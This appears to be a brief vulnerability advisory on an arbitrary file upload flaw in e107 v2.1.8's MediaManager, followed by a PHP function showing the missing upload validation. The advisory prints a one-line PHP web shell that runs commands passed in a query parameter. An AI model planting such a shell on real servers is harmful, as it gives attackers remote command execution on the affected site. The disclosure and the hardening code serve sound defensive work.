MediaManager in e107 v2.1.8 does not properly validate the file types and extensions of uploaded files before placing them in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.
Log in to the admin page (/e107_admin/admin.php) and access MediaManager.
<?php system($_GET['q']) ?>
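
The validation that the advisory says is missing can be sketched as follows. This is an added example, not code from e107 or from the original advisory; the function name `store_media_upload`, the `ALLOWED_MEDIA` allowlist and the storage directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist (not e107's): extension => MIME types accepted for it.
const ALLOWED_MEDIA = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
    'pdf'  => ['application/pdf'],
];

/**
 * Validate one entry of $_FILES and move it into $storageDir.
 * Returns the stored file name; throws RuntimeException on rejection.
 * Assumption: $storageDir is outside the web root, or is served with
 * script execution disabled.
 */
function store_media_upload(array $file, string $storageDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file((string) ($file['tmp_name'] ?? ''))) {
        throw new RuntimeException('upload failed or not an HTTP upload');
    }

    // Only the final extension of the client name is used, and only as a lookup key.
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_MEDIA)) {
        throw new RuntimeException('extension not allowed');
    }

    // Sniff the content; the client-supplied $file['type'] is not trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !in_array($mime, ALLOWED_MEDIA[$ext], true)) {
        throw new RuntimeException('content type does not match extension');
    }

    // Server-generated name: nothing from the client name reaches the file
    // system except the allowlisted extension.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($storageDir, '/') . '/' . $stored)) {
        throw new RuntimeException('could not store upload');
    }
    return $stored;
}
```

Content sniffing alone can be satisfied by a file that starts with a valid image header, so the extension allowlist and a storage location where the web server will not execute scripts are what prevent an uploaded file from running.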